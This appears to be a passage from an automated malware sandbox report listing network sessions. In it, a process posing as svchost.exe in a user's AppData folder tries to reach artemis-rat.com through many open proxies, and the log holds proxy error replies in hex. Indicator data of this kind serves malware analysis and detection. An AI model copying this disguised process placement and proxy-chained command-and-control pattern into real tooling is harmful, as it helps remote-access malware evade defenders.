                                                                                    Mar 9, 2024 13:14:30.246042013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.400836945 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2435192.168.2.55787765.21.255.197312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.248007059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.571845055 CET75INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:30.913935900 CET103INHTTP/1.1 400 Bad Request
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                    Data Ascii: 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2436192.168.2.55786083.243.92.154808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.253751040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2437192.168.2.557856120.33.126.200312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.259032965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.045707941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.068336010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2438192.168.2.557168117.160.250.163808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.262265921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.134279966 CET221INHTTP/1.1 403 Access Denied
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Connection: close
                                                                                    Cache-Control: no-store
                                                                                    Content-Type: text/html
                                                                                    Content-Language: en
                                                                                    Content-Length: 43
                                                                                    Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                    Data Ascii: You are not allowed to access the document.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2439192.168.2.557917184.170.248.5414543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.300389051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2440192.168.2.55791131.207.38.668043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.311554909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.613563061 CET408INHTTP/1.1 405 Method Not Allowed
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Server: Apache
                                                                                    Allow: OPTIONS,HEAD,GET,POST
                                                                                    Content-Length: 224
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2441192.168.2.558016104.24.220.528043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.325517893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.480099916 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2442192.168.2.558020162.159.242.88043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.326026917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.492433071 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2443192.168.2.558010172.67.254.1278043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.326184988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.481079102 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2444192.168.2.557892203.218.172.225808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.326245070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2445192.168.2.55784452.172.1.186312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.326529026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2446192.168.2.558074104.25.108.1208043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.326719046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.480999947 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2447192.168.2.55791243.131.248.1651567343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.345839977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2448192.168.2.557909120.76.42.209888843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.346004009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.686037064 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                                                                    Mar 9, 2024 13:14:30.687737942 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.21.6
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.21.6</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2449192.168.2.55804231.204.28.136543243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.366843939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.571443081 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Content-Length: 65
                                                                                    Proxy-Authenticate: Basic realm="Proxy"
                                                                                    Connection: close
                                                                                    Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                    Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2450192.168.2.558109104.16.207.868043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.394741058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.549120903 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2451192.168.2.558102162.159.243.1788043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.398443937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.559618950 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2452192.168.2.55804038.162.13.126312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.398452044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.814990997 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm=""
                                                                                    Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                    Data Ascii: Proxy Authentication Required


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2453192.168.2.557486111.20.217.178909143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.398502111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.833517075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
